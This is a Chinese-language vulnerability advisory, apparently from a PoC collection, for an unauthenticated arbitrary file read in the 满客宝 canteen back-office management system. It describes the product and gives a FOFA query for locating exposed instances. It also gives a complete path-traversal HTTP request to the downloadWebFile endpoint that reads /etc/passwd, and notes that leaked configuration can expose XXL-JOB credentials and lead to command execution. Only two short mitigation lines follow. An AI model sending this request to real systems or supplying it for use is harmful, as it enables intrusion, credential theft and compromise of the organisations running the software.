0x01 产品简介
满客宝后台管理系统由正奇晟业(北京)科技有限公司开发,满客宝智慧食堂系统的重要组成部分,它为餐饮管理者提供了一个全面的、智能化的管理平台。该系统集成了用户管理、消费限制、菜谱管理、卡务管理、进销存管理、数据统计、互动中心、食品安全、食堂环境监测、后厨行为检测、就餐客流量统计、集团管控等多种功能,旨在帮助餐饮管理者实现精细化运营,提升服务质量和管理效率。
0x02 漏洞概述
满客宝后台管理系统 downloadWebFile 接口存在存在任意文件读取漏洞,未经身份验证的远程攻击者可通过该漏洞读取系统配置文件,获取XXL-JOB账户密码,若XXL-JOB部署在公网,可能会进一步导致后台远程命令执行。
0x03 复现环境
FOFA:body="满客宝后台管理系统"
0x04 漏洞复现
PoC
GET /base/api/v1/kitchenVideo/downloadWebFile.swagger?fileName=&ossKey=/../../../../../../../../../../../etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
0x05 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本
